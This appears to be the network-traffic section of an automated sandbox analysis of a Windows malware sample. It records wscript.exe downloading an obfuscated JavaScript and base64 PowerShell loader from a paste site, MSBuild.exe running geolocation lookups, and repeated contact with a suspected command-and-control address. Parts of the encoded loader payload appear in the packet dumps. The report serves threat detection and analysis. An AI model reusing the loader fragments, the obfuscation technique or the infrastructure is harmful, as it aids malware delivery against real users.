Jan 5, 2025 08:33:18.385689974 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.385694981 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385765076 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385807037 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.386131048 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:33.568526983 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:33:33.570462942 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:33:33.575202942 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:33:56.090636969 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:33:56.559209108 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:33:57.356060982 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:33:58.652992964 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:34:01.152936935 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:34:03.579025984 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:34:03.580703020 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:34:03.586008072 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:34:06.059247971 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:34:15.746712923 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:34:33.594099998 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:34:33.595664024 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:34:33.600482941 CET	7346	49739	195.133.78.18	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 08:31:58.652909040 CET	53705	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:31:58.661937952 CET	53	53705	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:02.013020992 CET	53185	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:22.734797001 CET	57018	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:22.746562004 CET	53	57018	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:23.982867002 CET	65425	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:24.175467014 CET	53	65425	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:37.119674921 CET	59856	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:37.122792959 CET	61286	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:37.129977942 CET	53	61286	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:39.265605927 CET	50381	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:39.265765905 CET	57242	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:39.974953890 CET	56393	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:39.975213051 CET	56695	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:39.981486082 CET	53	56393	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:39.982333899 CET	53	56695	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.380167007 CET	62468	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.380167007 CET	61832	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.380472898 CET	59189	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.385518074 CET	52703	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.386881113 CET	53	62468	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.386991024 CET	53	61832	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.387265921 CET	53	59189	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.392225027 CET	53	52703	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.717541933 CET	64435	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.717541933 CET	56317	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:40.724349022 CET	53	56317	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:40.724373102 CET	53	64435	1.1.1.1	192.168.2.4
Jan 5, 2025 08:32:42.330805063 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.613859892 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.639266014 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.777054071 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.777070045 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.777121067 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.777153969 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.781574011 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.783214092 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.783400059 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.783914089 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.784027100 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.877116919 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.877142906 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.877152920 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.877161980 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.877595901 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.877757072 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.878568888 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.899755955 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.908636093 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.908926964 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.914395094 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.971714973 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:43.015335083 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:43.060705900 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.060724020 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.060749054 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.060760975 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.074526072 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.074881077 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.075057983 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.075381041 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.075625896 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.172668934 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.172683001 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.172692060 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.172699928 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.172708988 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.173932076 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.176732063 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.185884953 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.195203066 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.198365927 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.198740005 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.295722008 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.338897943 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:44.122739077 CET	52433	53	192.168.2.4	1.1.1.1
Jan 5, 2025 08:32:46.300715923 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:46.301045895 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:46.399615049 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:46.400402069 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:46.400530100 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:46.401555061 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:46.580698967 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:46.580698967 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:46.676516056 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:46.677170992 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:46.677552938 CET	443	61062	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:46.691061020 CET	61062	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:47.064333916 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:47.064333916 CET	55240	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:47.163516045 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:47.165097952 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:47.169126034 CET	443	55240	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:47.169538021 CET	55240	443	192.168.2.4	172.64.41.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 08:31:58.652909040 CET	192.168.2.4	1.1.1.1	0xf130	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:02.013020992 CET	192.168.2.4	1.1.1.1	0xf1c8	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:22.734797001 CET	192.168.2.4	1.1.1.1	0x8179	Standard query (0)	102.175.153.160.host.secureserver.net	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:23.982867002 CET	192.168.2.4	1.1.1.1	0xa812	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:37.119674921 CET	192.168.2.4	1.1.1.1	0x5315	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:37.122792959 CET	192.168.2.4	1.1.1.1	0x4222	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Jan 5, 2025 08:32:39.265605927 CET	192.168.2.4	1.1.1.1	0xedc9	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:39.265765905 CET	192.168.2.4	1.1.1.1	0xce94	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jan 5, 2025 08:32:39.974953890 CET	192.168.2.4	1.1.1.1	0xddff	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:39.975213051 CET	192.168.2.4	1.1.1.1	0x231a	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jan 5, 2025 08:32:40.380167007 CET	192.168.2.4	1.1.1.1	0x98b7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.380167007 CET	192.168.2.4	1.1.1.1	0x4673	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 5, 2025 08:32:40.380472898 CET	192.168.2.4	1.1.1.1	0x460f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.385518074 CET	192.168.2.4	1.1.1.1	0xabe7	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 5, 2025 08:32:40.717541933 CET	192.168.2.4	1.1.1.1	0x59b6	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.717541933 CET	192.168.2.4	1.1.1.1	0x44a0	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 5, 2025 08:32:44.122739077 CET	192.168.2.4	1.1.1.1	0x2a3d	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 08:31:58.661937952 CET	1.1.1.1	192.168.2.4	0xf130	No error (0)	paste.ee		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:31:58.661937952 CET	1.1.1.1	192.168.2.4	0xf130	No error (0)	paste.ee		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:02.020186901 CET	1.1.1.1	192.168.2.4	0xf1c8	No error (0)	res.cloudinary.com	ion.cloudinary.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:15.902384043 CET	1.1.1.1	192.168.2.4	0xc589	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:15.902384043 CET	1.1.1.1	192.168.2.4	0xc589	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:16.981312037 CET	1.1.1.1	192.168.2.4	0xaa3c	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:16.981312037 CET	1.1.1.1	192.168.2.4	0xaa3c	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:22.746562004 CET	1.1.1.1	192.168.2.4	0x8179	No error (0)	102.175.153.160.host.secureserver.net		160.153.175.102	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:24.175467014 CET	1.1.1.1	192.168.2.4	0xa812	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:37.126178980 CET	1.1.1.1	192.168.2.4	0x5315	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:37.129977942 CET	1.1.1.1	192.168.2.4	0x4222	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:39.272835970 CET	1.1.1.1	192.168.2.4	0xce94	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:39.274416924 CET	1.1.1.1	192.168.2.4	0xedc9	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:39.981486082 CET	1.1.1.1	192.168.2.4	0xddff	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:39.981486082 CET	1.1.1.1	192.168.2.4	0xddff	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.97	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:39.982333899 CET	1.1.1.1	192.168.2.4	0x231a	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:40.386881113 CET	1.1.1.1	192.168.2.4	0x98b7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.386881113 CET	1.1.1.1	192.168.2.4	0x98b7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.386991024 CET	1.1.1.1	192.168.2.4	0x4673	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 5, 2025 08:32:40.387265921 CET	1.1.1.1	192.168.2.4	0x460f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.387265921 CET	1.1.1.1	192.168.2.4	0x460f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.392225027 CET	1.1.1.1	192.168.2.4	0xabe7	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 5, 2025 08:32:40.724349022 CET	1.1.1.1	192.168.2.4	0x44a0	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 5, 2025 08:32:40.724373102 CET	1.1.1.1	192.168.2.4	0x59b6	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:40.724373102 CET	1.1.1.1	192.168.2.4	0x59b6	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 08:32:44.129897118 CET	1.1.1.1	192.168.2.4	0x2a3d	No error (0)	res.cloudinary.com	resc.cloudinary.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:58.643316984 CET	1.1.1.1	192.168.2.4	0xe117	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 08:32:58.643316984 CET	1.1.1.1	192.168.2.4	0xe117	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

102.175.153.160.host.secureserver.net

clients2.googleusercontent.com

chrome.cloudflare-dns.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	178.237.33.50	80	7912	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 08:32:24.348283052 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jan 5, 2025 08:32:24.949326038 CET	1171	IN	HTTP/1.1 200 OK date: Sun, 05 Jan 2025 07:32:24 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	443	7296	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:31:59 UTC	319	OUT	GET /d/snSm4 HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2025-01-05 07:31:59 UTC	1236	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 07:31:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJgah7rwztp6lmcHSBzvHABNUNFegA8wNhf9Apn%2Bw4e6lwgMmbNBquWCvkjcIPH%2B9Ua2XDRpUgVnsLH%2BY%2BszTffwKqOI%2FkxgNifWpZwlutlDgjrPX3R489lRsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd1c597493e4213-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:31:59 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 33 36 26 6d 69 6e 5f 72 74 74 3d 31 36 32 36 26 72 74 74 5f 76 61 72 3d 36 33 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 35 26 72 65 63 76 5f 62 79 74 65 73 3d 39 30 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 30 39 36 30 31 26 63 77 6e 64 3d 32 32 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 64 65 63 65 66 63 36 36 64 62 33 63 62 35 31 26 74 73 3d 32 37 35 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1626&rtt_var=630&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2815&recv_bytes=901&delivery_rate=1709601&cwnd=229&unsent_bytes=0&cid=bdecefc66db3cb51&ts=275&x=0"
2025-01-05 07:31:59 UTC	1287	IN	Data Raw: 31 39 35 34 0d 0a 6d 69 73 62 65 63 75 6d 20 3d 20 7b 0d 0a 20 20 20 20 65 6d 61 6e 64 69 62 75 6c 61 74 65 3a 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 0d 0a 20 20 20 20 64 65 63 6f 64 65 3a 20 66 75 6e 63 74 69 6f 6e 28 6c 65 6e 67 74 68 65 6e 69 6e 67 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 22 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 68 61 6b 79 2c 20 74 6f 6b 65 6e 69 7a 61 74 69 6f 6e 2c 20 6c 6f 76 65 61 62 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 61 64 64 68 75 2c 20 62 75 72 69 61 62 6c 65 2c 20 74 75 Data Ascii: 1954misbecum = { emandibulate: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", decode: function(lengthenings) { var decodedString = ""; var shaky, tokenization, loveable; var saddhu, buriable, tu
2025-01-05 07:31:59 UTC	1369	IN	Data Raw: 65 47 55 67 4c 55 4e 76 62 57 31 68 62 6d 51 67 49 6d 6c 6d 49 43 67 6b 62 6e 56 73 62 43 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 74 62 6d 55 67 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 49 43 31 68 62 6d 51 67 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 4c 6c 42 54 56 6d 56 79 63 32 6c 76 62 69 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 74 62 6d 55 67 4a 47 35 31 62 47 77 70 49 48 73 67 57 33 5a 76 61 57 52 64 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 4c 6c 42 54 56 Data Ascii: eGUgLUNvbW1hbmQgImlmICgkbnVsbCtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbitbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTV
2025-01-05 07:31:59 UTC	1369	IN	Data Raw: 67 4a 46 64 6f 59 32 4e 48 56 57 6c 36 59 6b 70 58 59 55 35 6f 62 30 4e 4d 57 6b 4e 4d 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 47 46 30 59 53 67 6b 61 55 78 75 51 6b 64 6c 62 30 39 77 5a 6d 5a 78 62 31 56 42 53 32 31 73 61 46 49 70 4f 79 52 4c 62 32 52 77 5a 6b 74 30 62 32 52 6a 57 6c 42 58 61 32 74 56 54 45 64 58 56 53 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 39 49 46 74 54 65 58 4e 30 5a 57 30 75 56 47 56 34 64 43 35 46 62 6d 4e 76 5a 47 6c 75 5a 31 30 36 4f 6c 56 55 52 6a 67 75 52 32 56 30 55 33 52 79 61 57 35 6e 4b 43 52 4f 52 30 74 49 59 6d 31 69 54 47 64 6a 65 6b 4a 6c 5a 6d 68 6d 54 30 46 48 61 53 6b 37 4a 47 74 52 59 6b 70 36 53 Data Ascii: gJFdoY2NHVWl6YkpXYU5ob0NMWkNMLkRvd25sb2FkRGF0YSgkaUxuQkdlb09wZmZxb1VBS21saFIpOyRLb2RwZkt0b2RjWlBXa2tVTEdXVS9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCROR0tIYm1iTGdjekJlZmhmT0FHaSk7JGtRYkp6S
